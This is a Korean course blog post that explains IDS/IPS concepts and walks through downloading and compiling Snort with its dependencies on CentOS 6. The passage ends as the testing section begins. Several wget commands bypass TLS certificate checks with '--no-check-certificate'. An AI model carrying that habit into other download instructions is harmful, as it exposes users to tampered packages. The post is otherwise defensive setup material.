'모의해킹 침해대응 전문가 과정' 카테고리의 글 목록 (2 Page)

« » 2024.5
일	월	화	수	목	금	토
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31

20160823 Snort on CentOS6.X

모의해킹 침해대응 전문가 과정 / 2016. 8. 23. 22:16

Snort(Sniffer and More)

NIDS on CentOS 6.4/6.5

■ Firewall(방화벽) vs IDS(침입탐지시스템) vs IPS(침입차단시스템)

구분	IPS(침입차단시스템)	IDS(침입탐지시스템)	F/W(침입차단시스템)
연결 방법	In-Line	Mirror(TAP, Switch)	In-Line
차단 방법	자체	Reset Signal, 방화벽 연동	자체
on-way attack	탐지/차단	탐지	불가능
DDoS & Dos	탐지/차단	탐지	일부지원
서비스 중단 시 장애 극복	FOD를 통한 장애 극복	무관	HA, Fail Over를 통한 극복
실시간 네트워크 세션 감시	지원	지원	지원
Worm Virus	탐지/차단	탐지	불가능
NAT	지원 안됨	지원 안됨	지원함
다중포트	2개 구간	8개 구간	NIC 연결 추가 지원
장점	모든 패킷에 대해 자체 탐지 및 차단 모듈 지원으로 네트워크 보호	모든 패킷에 대해 자체 탐지 모듈 지원으로 네트워크 이상 징후 경고	서비스 및 객체 대한 접근 권한 정책을 구체적 규정하는 것이 가능하여 불필요한 서비스 사용 제한
단점	NAT등 방화벽 고유 기능 지원 불가로 사설 네트워크 구성시 제한	방화벽과 연동 방어를 통해 차단 가능함(독립적 차단 제하적)	IP와 Port 이외의 복합적으리고 정교한 공격 탐지 불가

■ IDS(Intrution Detection System)

● Network defense or "protection" model
- Planning : policy, rule
- Prevention : IPS
- Detection : IDS
- Response : Email, Alert, Terminate session, report

● Intrusion detection is the process of discovering, analyzing, and reporting unauthorized or damaging network or computer activities.

■ IDS(Intrution Detection System) 종류

● N-IDS(Network based IDS)
Network traffic is monitored by network-based intrusion detection systems.
-> Open Source : Snort

● H-IDS(Host based IDS)
Computer processes are monnitored by host-based intrusion detection systems.
-> Open Source : Tripwire

■ Snort(sniffer and more) 소개

Snort is Network Intrusion Detection System (NIDS). Snort can sniff your network and alert you based on his rule DB if there is an attack on your computers network. It is an opensource system that is build from tcpdump (linux sniffer tool).

Snort : an open source netework intrusion prevention and detection system. It uses a rule-based language combining signature, protocol and anomaly inspection methods.

Snort : the most widely deployed intrusion detection and prevention technology and it has become the standard technology worldwide in the industry.

● A packet sniffer: capture and display packets from the network with different levels of detail on the console.

● Packet logger: log data in text file.

● Honeypot monitor: deceiving hostile parties.

● A fast, flexible, small-footprint, open-source NIDS developed by the security commnunity.

● Lead coder: Marty Roesch, now founder of Sourcefire(www.sourcefire.com).

● Initially developed in late 1998 as a sniffer with consistent output, unlike protocol-dependent output of TCPDump.

■ 사용시스템

- centos 6.X(6.4 or 6.5)

1. Snort 설치(Snort Installation)

■ INDEX

---------------------------

■ 시스템 정보 확인

■ snort 관련 패키지 다운로드

■ snort rules 다운로드

■ snort 관련 패키지 컴파일

---------------------------

(1) 시스템 정보 확인

# uname -a

Linux ids.example.com 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux

# cat /etc/redhat-release

CentOS release 6.4 (Final)

# cat /proc/cpuinfo

processor : 0

vendor_id : AuthenticAMD

cpu family : 21

model : 2

model name : AMD FX(tm)-6300 Six-Core Processor

stepping : 0

cpu MHz : 3507.009

cache size : 2048 KB

physical id : 0

siblings : 6

core id : 0

cpu cores : 6

apicid : 0

initial apicid : 0

fpu : yes

fpu_exception : yes

cpuid level : 13

wp : yes

flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good tsc_reliable nonstop_tsc aperfmperf unfair_spinlock pni pclmulqdq ssse3 fma cx16 sse4_1 sse4_2 x2apic popcnt aes xsave avx f16c hypervisor lahf_lm cmp_legacy extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw xop fma4 tbm bmi1

..... (중략) .....

# top -n 1 | egrep '(Mem:|Swap:)' (# free)

Mem: 881476k total, 553036k used, 328440k free, 23504k buffers

Swap: 4095992k total, 0k used, 4095992k free, 227476k cached

# df -h (# df -h -T)

Filesystem Size Used Avail Use% Mounted on

/dev/mapper/vg_ids-lv_root

36G 3.8G 30G 12% /

tmpfs 431M 224K 431M 1% /dev/shm

/dev/sda1 485M 38M 423M 9% /boot

-> LVM(Logical Volume Manager)를 통해 구성이 되어져 있다.

# ifconfig (# ip addr)

eth0 Link encap:Ethernet HWaddr 00:0C:29:45:A1:D8

inet addr:192.168.20.203 Bcast:192.168.20.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe45:a1d8/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:32 errors:0 dropped:0 overruns:0 frame:0

TX packets:17 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:11468 (11.1 KiB) TX bytes:1251 (1.2 KiB)

eth1 Link encap:Ethernet HWaddr 00:0C:29:45:A1:E2

inet addr:192.168.10.203 Bcast:192.168.10.255 Mask:255.255.255.0

inet6 addr: fe80::20c:29ff:fe45:a1e2/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:19 errors:0 dropped:0 overruns:0 frame:0

TX packets:6 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:2006 (1.9 KiB) TX bytes:468 (468.0 b)

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:16 errors:0 dropped:0 overruns:0 frame:0

TX packets:16 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:960 (960.0 b) TX bytes:960 (960.0 b)

(2) snort 관련 패키지 다운로드

■ 다운로드 패키지 목록(Download snort packages)

====================예제========================================

snort-2.9.7.0.tar.gz www.snort.org(최신버전으로 받는다.)

daq-2.0.4.tar.gz www.snort.org(최신버전으로 받는다.)

libpcap-1.6.2.tar.gz www.tcpdump.org(최신버전으로 받는다.)

pcre-8.36.tar.bz2 www.pcre.org(최신버전으로 받는다.)

libdnet-1.12.tgz code.google.com/p/libdnet

================================================================

① 패키지 다운로드 디렉토리 생성

# mkdir /snort && cd /snort

② snort && daq 패키지 다운로드

● http://www.snort.org 사이트에 들어 가서 최신 프로그램을 확인한다.

■ 2015년 05월26일 : daq-2.0.5.tar.gz / snort-2.9.7.3.tar.gz

■ 2015년 09월08일 : daq-2.0.6.tar.gz / snort-2.9.7.5.tar.gz

■ 2016년 01월06일 : daq-2.0.6.tar.gz / snort-2.9.8.0.tar.gz

■ 2016년 05월31일 : daq-2.0.6.tar.gz / snort-2.9.8.2.tar.gz

■ 2016년 08월02일 : daq-2.0.6.tar.gz / snort-2.9.8.3.tar.gz

# wget https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

--2014-12-11 16:31:46-- https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.25.35, 104.28.24.35, 2400:cb00:2048:1::681c:1823, ...

Connecting to www.snort.org|104.28.25.35|:443... connected.

ERROR: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

To connect to www.snort.org insecurely, use ‘--no-check-certificate’.

# wget --no-check-certificate https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

--2014-12-11 16:31:46-- https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.25.35, 104.28.24.35, 2400:cb00:2048:1::681c:1823, ...

Connecting to www.snort.org|104.28.25.35|:443... connected.

ERROR: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

To connect to www.snort.org insecurely, use ‘--no-check-certificate’.

snort/daq-2.0.4.tar.gzheck-certificate https://www.snort.org/downloads/

--2014-12-11 16:33:44-- https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM%3D [following]

--2014-12-11 16:33:46-- https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM%3D

Resolving s3.amazonaws.com... 54.231.244.8

Connecting to s3.amazonaws.com|54.231.244.8|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 495316 (484K) [,binary/octet-stream]

Saving to: “daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=”

100%[=========================================>] 495,316 136K/s in 3.6s

2014-12-11 16:33:50 (136 KB/s) - “daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=” saved [495316/495316]

# ls

daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418286827&Signature=%2F9yiNQ2GbvnONASKekS4tbVQePM=

# rm -rf daq*

#

# wget --no-check-certificate https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz \

-O daq-2.0.4.tar.gz

--2014-12-11 16:37:26-- https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... failed: Name or service not known.

wget: unable to resolve host address “www.snort.org”

snort/daq-2.0.4.tar.gz -O daq-2.0.4.tar.gzps://www.snort.org/downloads/s

--2014-12-11 16:37:48-- https://www.snort.org/downloads/snort/daq-2.0.4.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287071&Signature=6baO407gh69zPNZDgydKaYKn7p8%3D [following]

--2014-12-11 16:37:49-- https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/830/original/daq-2.0.4.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287071&Signature=6baO407gh69zPNZDgydKaYKn7p8%3D

Resolving s3.amazonaws.com... 54.231.244.0

Connecting to s3.amazonaws.com|54.231.244.0|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 495316 (484K) [,binary/octet-stream]

Saving to: “daq-2.0.4.tar.gz”

100%[=========================================>] 495,316 110K/s in 4.4s

2014-12-11 16:37:56 (110 KB/s) - “daq-2.0.4.tar.gz” saved [495316/495316]

# wget --no-check-certificate https://www.snort.org/downloads/snort/snort-2.9.7.0.tar.gz \

-O snort-2.9.7.0.tar.gz

--2014-12-11 16:40:11-- https://www.snort.org/downloads/snort/snort-2.9.7.0.tar.gz

Resolving www.snort.org... 104.28.24.35, 104.28.25.35, 2400:cb00:2048:1::681c:1923, ...

Connecting to www.snort.org|104.28.24.35|:443... connected.

WARNING: certificate common name “ssl2000.cloudflare.com” doesn’t match requested host name “www.snort.org”.

HTTP request sent, awaiting response... 302 Found

Location: https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/819/original/snort-2.9.7.0.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287214&Signature=20oRt6vZbNqfINNT8llYTTq3%2Bxc%3D [following]

--2014-12-11 16:40:12-- https://s3.amazonaws.com/snort-org-site/production/release_files/files/000/000/819/original/snort-2.9.7.0.tar.gz?AWSAccessKeyId=AKIAIXACIED2SPMSC7GA&Expires=1418287214&Signature=20oRt6vZbNqfINNT8llYTTq3%2Bxc%3D

Resolving s3.amazonaws.com... 54.231.244.0

Connecting to s3.amazonaws.com|54.231.244.0|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 6340553 (6.0M) [,binary/octet-stream]

Saving to: “snort-2.9.7.0.tar.gz”

100%[=========================================>] 6,340,553 254K/s in 18s

2014-12-11 16:40:31 (340 KB/s) - “snort-2.9.7.0.tar.gz” saved [6340553/6340553]

③ libpcap 패키지 다운로드

● http://www.tcpdump.org 사이트에 접속하여 최신의 패키지를 다운로드 한다.

■ 2015년 05월26일 : libpcap-1.7.3.tar.gz

■ 2015년 09월08일 : libpcap-1.7.4.tar.gz

■ 2016년 01월06일 : libpcap-1.7.4.tar.gz

■ 2016년 05월31일 : libpcap-1.7.4.tar.gz

# wget http://www.tcpdump.org/release/libpcap-1.6.2.tar.gz

--2014-12-11 16:45:01-- http://www.tcpdump.org/release/libpcap-1.6.2.tar.gz

Resolving www.tcpdump.org... 192.139.46.66, 69.4.231.52, 132.213.238.6, ...

Connecting to www.tcpdump.org|192.139.46.66|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 651237 (636K) [application/x-gzip]

Saving to: “libpcap-1.6.2.tar.gz”

100%[=========================================>] 651,237 28.9K/s in 15s

2014-12-11 16:45:16 (43.6 KB/s) - “libpcap-1.6.2.tar.gz” saved [651237/651237]

④ pcre 패키지 다운로드

● http://sourceforge.net/projects/pcre/files/pcre 사이트에 접속하여 최신의 패키지를 다운로드 한다.

■ 2015년 05월26일 : pcre-8.37.tar.gz

■ 2015년 09월08일 : pcre-8.37.tar.gz

■ 2016년 01월06일 : pcre-8.37.tar.gz

■ 2016년 05월31일 : pcre-8.38.tar.gz

# wget http://sourceforge.net/projects/pcre/files/pcre/8.36/pcre-8.36.tar.gz/download

--2014-12-11 16:48:25-- http://sourceforge.net/projects/pcre/files/pcre/8.36/pcre-8.36.tar.gz/download

Resolving sourceforge.net... 216.34.181.60

Connecting to sourceforge.net|216.34.181.60|:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: http://downloads.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz?r=&ts=1418284108&use_mirror=jaist [following]

--2014-12-11 16:48:26-- http://downloads.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz?r=&ts=1418284108&use_mirror=jaist

Resolving downloads.sourceforge.net... 216.34.181.59

Connecting to downloads.sourceforge.net|216.34.181.59|:80... connected.

HTTP request sent, awaiting response... 302 Found

Location: http://jaist.dl.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz [following]

--2014-12-11 16:48:27-- http://jaist.dl.sourceforge.net/project/pcre/pcre/8.36/pcre-8.36.tar.gz

Resolving jaist.dl.sourceforge.net... 150.65.7.130, 2001:df0:2ed:feed::feed

Connecting to jaist.dl.sourceforge.net|150.65.7.130|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2009464 (1.9M) [application/x-gzip]

Saving to: “pcre-8.36.tar.gz.1”

100%[=========================================>] 2,009,464 502K/s in 3.9s

2014-12-11 16:48:31 (502 KB/s) - “pcre-8.36.tar.gz.1” saved [2009464/2009464]

⑤ libdnet 패키지 다운로드

● https://code.google.com/p/libdnet/ 사이트에 접속하여 최신의 패키지를 다운로드 한다.

■ 2015년 05월26일 : libdnet-1.12.tgz

■ 2015년 09월08일 : libdnet-1.12.tgz

■ 2016년 01월06일 : libdnet-1.12.tar.gz

■ 2016년 05월31일 : libdnet-1.12.tar.gz

# cd /snort

# wget https://github.com/dugsong/libdnet/archive/libdnet-1.12.tar.gz -O libdnet-1.12.tar.gz

--2016-01-06 22:15:11-- https://github.com/dugsong/libdnet/archive/libdnet-1.12.tar.gz

Resolving github.com... 192.30.252.130

Connecting to github.com|192.30.252.130|:443... connected.

HTTP request sent, awaiting response... 302 Found

Location: https://codeload.github.com/dugsong/libdnet/tar.gz/libdnet-1.12 [following]

--2016-01-06 22:15:12-- https://codeload.github.com/dugsong/libdnet/tar.gz/libdnet-1.12

Resolving codeload.github.com... 192.30.252.147

Connecting to codeload.github.com|192.30.252.147|:443... connected.

HTTP request sent, awaiting response... 200 OK

Length: 959945 (937K) [application/x-gzip]

Saving to: `libdnet-1.12'

100%[=================================================>] 959,945 295K/s in 3.2s

2016-01-06 22:15:16 (295 KB/s) - `libdnet-1.12' saved [959945/959945]

# ls

daq-2.0.6.tar.gz libpcap-1.7.4.tar.gz snort-2.9.8.0.tar.gz

libdnet-master.zip pcre-8.37.tar.gz

(3) snort rules 다운로드(Download snort rules packages)

==================================================

oinkmaster-1.2.0.rpm www.rpmfind.net/rpm.pbone.net

snortrules-snapshot-2956.tar.gz www.snort.org

==================================================

■ oinkmaster 파일 다운로드(실습에서는 rpm 파일을 받는다.)

(source code 받는 경우)

# wget http://sourceforge.net/projects/oinkmaster/files/oinkmaster/1.2/oinkmaster-1.2.tar.gz/download

or

(rpm 파일 받는 경우)

# wget ftp://ftp.pbone.net/mirror/ftp.sourceforge.net/pub/sourceforge/s/sn/snortsas/oinkmaster-1.2-0.noarch.rpm

■ snortrules 파일 다운로드

(주의) 반드시 www.snort.org 사이트에 무료계정을 등록한다.

■ 2015년 05월26일 : snortrules-snapshot-2973.tar.gz

■ 2015년 09월08일 : snortrules-snapshot-2975.tar.gz

■ 2016년 01월06일 : snortrules-snapshot-2980.tar.gz

■ 2016년 05월31일 : snortrules-snapshot-2982.tar.gz

# wget --no-check-certificate \

https://www.snort.org/downloads/registered/snortrules-snapshot-2970.tar.gz \

-O snortrules-snapshot-2970.tar.gz

# ls

daq-2.0.4.tar.gz oinkmaster-1.2.tar.gz snortrules-snapshot-2970.tar.gz

libdnet-1.12.tgz pcre-8.36.tar.gz

libpcap-1.6.2.tar.gz snort-2.9.7.0.tar.gz

-> (주의) snortrules-snapshot-*.tar.gz 파일은 반드시 file 명령어를 통해 확인해 봐야 한다.

만약 gzip으로 압축된 파일이 아니라고 나오는 경우(HTML document text)에는 직접 받아서

서버에 올려야 한다.

(비정상)

# file snortrules-snopshot-*.tar.gz

snortrules-snapshot-2975.tar.gz: HTML document text

(정상)

# file snortrules-snopshot-*.tar.gz

snortrules-snapshot-2980.tar.gz: gzip compressed data, from Unix, last modified:....

(4) 패키지 검파일(How to compile the packages)

■ 패키지 설치 순서(Package installation order)

==============예제=============

oinkmaster-1.2.tar.gz

snortrules-snapshot-2970.tar.gz

libpcap-1.6.2.tar.gz

pcre-8.36.tar.gz

libdnet-1.12.tgz

daq-2.0.4.tar.gz

snort-2.9.7.0.tar.gz

===============================

■ 패키지 검파일 방법

====================

# tar xvzf <PKG>

# cd <PKG>

# ./configure

# make

# make install

====================

[참고] configure/make/make install

① 선수 패키지 설치

# yum -y install gcc flex bison zlib zlib-devel gcc-c++

Loaded plugins: fastestmirror, refresh-packagekit, security

Loading mirror speeds from cached hostfile

* base: ftp.kaist.ac.kr

* extras: ftp.kaist.ac.kr

* updates: ftp.kaist.ac.kr

base | 3.7 kB 00:00

extras | 3.4 kB 00:00

updates | 3.4 kB 00:00

Setting up Install Process

Package zlib-1.2.3-29.el6.x86_64 already installed and latest version

Resolving Dependencies

--> Running transaction check

---> Package bison.x86_64 0:2.4.1-5.el6 will be installed

---> Package flex.x86_64 0:2.5.35-9.el6 will be installed

---> Package gcc.x86_64 0:4.4.7-11.el6 will be installed

--> Processing Dependency: libgomp = 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: cpp = 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: libgcc >= 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: glibc-devel >= 2.2.90-12 for package: gcc-4.4.7-11.el6.x86_64

--> Processing Dependency: cloog-ppl >= 0.15 for package: gcc-4.4.7-11.el6.x86_64

---> Package zlib-devel.x86_64 0:1.2.3-29.el6 will be installed

--> Running transaction check

---> Package cloog-ppl.x86_64 0:0.15.7-1.2.el6 will be installed

--> Processing Dependency: libppl_c.so.2()(64bit) for package: cloog-ppl-0.15.7-1.2.el6.x86_64

--> Processing Dependency: libppl.so.7()(64bit) for package: cloog-ppl-0.15.7-1.2.el6.x86_64

---> Package cpp.x86_64 0:4.4.7-11.el6 will be installed

--> Processing Dependency: libmpfr.so.1()(64bit) for package: cpp-4.4.7-11.el6.x86_64

---> Package glibc-devel.x86_64 0:2.12-1.149.el6 will be installed

--> Processing Dependency: glibc-headers = 2.12-1.149.el6 for package: glibc-devel-2.12-1.149.el6.x86_64

--> Processing Dependency: glibc = 2.12-1.149.el6 for package: glibc-devel-2.12-1.149.el6.x86_64

--> Processing Dependency: glibc-headers for package: glibc-devel-2.12-1.149.el6.x86_64

---> Package libgcc.x86_64 0:4.4.7-3.el6 will be updated

---> Package libgcc.x86_64 0:4.4.7-11.el6 will be an update

---> Package libgomp.x86_64 0:4.4.7-3.el6 will be updated

---> Package libgomp.x86_64 0:4.4.7-11.el6 will be an update

--> Running transaction check

---> Package glibc.x86_64 0:2.12-1.107.el6 will be updated

--> Processing Dependency: glibc = 2.12-1.107.el6 for package: glibc-common-2.12-1.107.el6.x86_64

---> Package glibc.x86_64 0:2.12-1.149.el6 will be an update

---> Package glibc-headers.x86_64 0:2.12-1.149.el6 will be installed

--> Processing Dependency: kernel-headers >= 2.2.1 for package: glibc-headers-2.12-1.149.el6.x86_64

--> Processing Dependency: kernel-headers for package: glibc-headers-2.12-1.149.el6.x86_64

---> Package mpfr.x86_64 0:2.4.1-6.el6 will be installed

---> Package ppl.x86_64 0:0.10.2-11.el6 will be installed

--> Running transaction check

---> Package glibc-common.x86_64 0:2.12-1.107.el6 will be updated

---> Package glibc-common.x86_64 0:2.12-1.149.el6 will be an update

---> Package kernel-headers.x86_64 0:2.6.32-504.1.3.el6 will be installed

--> Finished Dependency Resolution

Dependencies Resolved

===================================================================================

Package Arch Version Repository Size

===================================================================================

Installing:

bison x86_64 2.4.1-5.el6 base 637 k

flex x86_64 2.5.35-9.el6 base 285 k

gcc x86_64 4.4.7-11.el6 base 10 M

zlib-devel x86_64 1.2.3-29.el6 base 44 k

Installing for dependencies:

cloog-ppl x86_64 0.15.7-1.2.el6 base 93 k

cpp x86_64 4.4.7-11.el6 base 3.7 M

glibc-devel x86_64 2.12-1.149.el6 base 983 k

glibc-headers x86_64 2.12-1.149.el6 base 611 k

kernel-headers x86_64 2.6.32-504.1.3.el6 updates 3.3 M

mpfr x86_64 2.4.1-6.el6 base 157 k

ppl x86_64 0.10.2-11.el6 base 1.3 M

Updating for dependencies:

glibc x86_64 2.12-1.149.el6 base 3.8 M

glibc-common x86_64 2.12-1.149.el6 base 14 M

libgcc x86_64 4.4.7-11.el6 base 102 k

libgomp x86_64 4.4.7-11.el6 base 133 k

Transaction Summary

===================================================================================

Install 11 Package(s)

Upgrade 4 Package(s)

Total download size: 39 M

Downloading Packages:

(1/15): bison-2.4.1-5.el6.x86_64.rpm | 637 kB 00:01

(2/15): cloog-ppl-0.15.7-1.2.el6.x86_64.rpm | 93 kB 00:00

(3/15): cpp-4.4.7-11.el6.x86_64.rpm | 3.7 MB 00:09

(4/15): flex-2.5.35-9.el6.x86_64.rpm | 285 kB 00:00

(5/15): gcc-4.4.7-11.el6.x86_64.rpm | 10 MB 00:10

(6/15): glibc-2.12-1.149.el6.x86_64.rpm | 3.8 MB 00:03

(7/15): glibc-common-2.12-1.149.el6.x86_64.rpm | 14 MB 00:09

(8/15): glibc-devel-2.12-1.149.el6.x86_64.rpm | 983 kB 00:00

(9/15): glibc-headers-2.12-1.149.el6.x86_64.rpm | 611 kB 00:00

(10/15): kernel-headers-2.6.32-504.1.3.el6.x86_64.rpm | 3.3 MB 00:03

(11/15): libgcc-4.4.7-11.el6.x86_64.rpm | 102 kB 00:00

(12/15): libgomp-4.4.7-11.el6.x86_64.rpm | 133 kB 00:00

(13/15): mpfr-2.4.1-6.el6.x86_64.rpm | 157 kB 00:00

(14/15): ppl-0.10.2-11.el6.x86_64.rpm | 1.3 MB 00:01

(15/15): zlib-devel-1.2.3-29.el6.x86_64.rpm | 44 kB 00:00

-----------------------------------------------------------------------------------

Total 962 kB/s | 39 MB 00:41

warning: rpmts_HdrFromFdno: Header V3 RSA/SHA1 Signature, key ID c105b9de: NOKEY

Retrieving key from file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6

Importing GPG key 0xC105B9DE:

Userid : CentOS-6 Key (CentOS 6 Official Signing Key) <centos-6-key@centos.org>

Package: centos-release-6-4.el6.centos.10.x86_64 (@anaconda-CentOS-201303020151.x86_64/6.4)

From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6

Running rpm_check_debug

Running Transaction Test

Transaction Test Succeeded

Running Transaction

Updating : libgcc-4.4.7-11.el6.x86_64 1/19

Updating : glibc-2.12-1.149.el6.x86_64 2/19

Updating : glibc-common-2.12-1.149.el6.x86_64 3/19

Updating : libgomp-4.4.7-11.el6.x86_64 4/19

Installing : mpfr-2.4.1-6.el6.x86_64 5/19

Installing : cpp-4.4.7-11.el6.x86_64 6/19

Installing : ppl-0.10.2-11.el6.x86_64 7/19

Installing : cloog-ppl-0.15.7-1.2.el6.x86_64 8/19

Installing : kernel-headers-2.6.32-504.1.3.el6.x86_64 9/19

Installing : glibc-headers-2.12-1.149.el6.x86_64 10/19

Installing : glibc-devel-2.12-1.149.el6.x86_64 11/19

Installing : gcc-4.4.7-11.el6.x86_64 12/19

Installing : bison-2.4.1-5.el6.x86_64 13/19

Installing : flex-2.5.35-9.el6.x86_64 14/19

Installing : zlib-devel-1.2.3-29.el6.x86_64 15/19

Cleanup : libgomp-4.4.7-3.el6.x86_64 16/19

Cleanup : glibc-2.12-1.107.el6.x86_64 17/19

Cleanup : glibc-common-2.12-1.107.el6.x86_64 18/19

Cleanup : libgcc-4.4.7-3.el6.x86_64 19/19

Verifying : glibc-common-2.12-1.149.el6.x86_64 1/19

Verifying : gcc-4.4.7-11.el6.x86_64 2/19

Verifying : glibc-2.12-1.149.el6.x86_64 3/19

Verifying : bison-2.4.1-5.el6.x86_64 4/19

Verifying : glibc-headers-2.12-1.149.el6.x86_64 5/19

Verifying : glibc-devel-2.12-1.149.el6.x86_64 6/19

Verifying : libgcc-4.4.7-11.el6.x86_64 7/19

Verifying : libgomp-4.4.7-11.el6.x86_64 8/19

Verifying : flex-2.5.35-9.el6.x86_64 9/19

Verifying : mpfr-2.4.1-6.el6.x86_64 10/19

Verifying : kernel-headers-2.6.32-504.1.3.el6.x86_64 11/19

Verifying : zlib-devel-1.2.3-29.el6.x86_64 12/19

Verifying : cpp-4.4.7-11.el6.x86_64 13/19

Verifying : ppl-0.10.2-11.el6.x86_64 14/19

Verifying : cloog-ppl-0.15.7-1.2.el6.x86_64 15/19

Verifying : glibc-2.12-1.107.el6.x86_64 16/19

Verifying : glibc-common-2.12-1.107.el6.x86_64 17/19

Verifying : libgomp-4.4.7-3.el6.x86_64 18/19

Verifying : libgcc-4.4.7-3.el6.x86_64 19/19

Installed:

bison.x86_64 0:2.4.1-5.el6 flex.x86_64 0:2.5.35-9.el6

gcc.x86_64 0:4.4.7-11.el6 zlib-devel.x86_64 0:1.2.3-29.el6

Dependency Installed:

cloog-ppl.x86_64 0:0.15.7-1.2.el6 cpp.x86_64 0:4.4.7-11.el6

glibc-devel.x86_64 0:2.12-1.149.el6 glibc-headers.x86_64 0:2.12-1.149.el6

kernel-headers.x86_64 0:2.6.32-504.1.3.el6 mpfr.x86_64 0:2.4.1-6.el6

ppl.x86_64 0:0.10.2-11.el6

Dependency Updated:

glibc.x86_64 0:2.12-1.149.el6 glibc-common.x86_64 0:2.12-1.149.el6

libgcc.x86_64 0:4.4.7-11.el6 libgomp.x86_64 0:4.4.7-11.el6

Complete!

(4-1) oinkmaster 패키지 설치

# cd /snort

# tar xvzf oinkmaster-1.2.tar.gz

(4-2) snortrules 압축해제

# mkdir snortrules

# mv snortrules-snapshot-2970.tar.gz snortrules

# ls snortrules

(4-3) libpcap 컴파일 & 설치

# tar xvzf libpcap*.tar.gz

# cd libpcap-1.6.2

# ./configure

# make

# make install

[참고] # ./configure --help

[참고] # ./configure > /tmp/libpcap.config 2>&1

[참고] # ./configure && make && make install

[참고] # time ./configure

[참고] # ./configure ; echo $?

(4-4) pcre 컴파일 & 설치

a.tar.gz : # tar xvzf a.tar.gz (# gunzip a.tar.gz ; # tar xvf a.tar)

a.tar.bz2: # tar xvjf a.tar.bz2 (# bunzip2 a.tar.bz2; # tar xvf a.tar)

# cd /snort

# tar xvzf pcre-8.36.tar.gz

# cd pcre-8.36

# ./configure

# make

# make install

(4-5) libdnet 컴파일 & 설치

# cd /snort

# tar xvzf libdnet-1.12.tar.gz

# cd libdnet-1.12

# ./configure

# make

# make install

(4-6) daq 컴파일 & 설치

# cd /snort

# tar xvzf daq-2.0.4.tar.gz

# cd daq-2.0.4

# ./configure

# make

# make install

(4-7) snort 컴파일 & 설치

# cd /snort

# tar xvzf snort-2.9.7.0.tar.gz

# cd snort-2.9.7.0

# ./configure (주의) (snort 2.9.7.5 이상) ./configure --enable-sourcefire

# make

# make install

(5) Test Snort

① interface mode 변경 및 snort 버전 확인

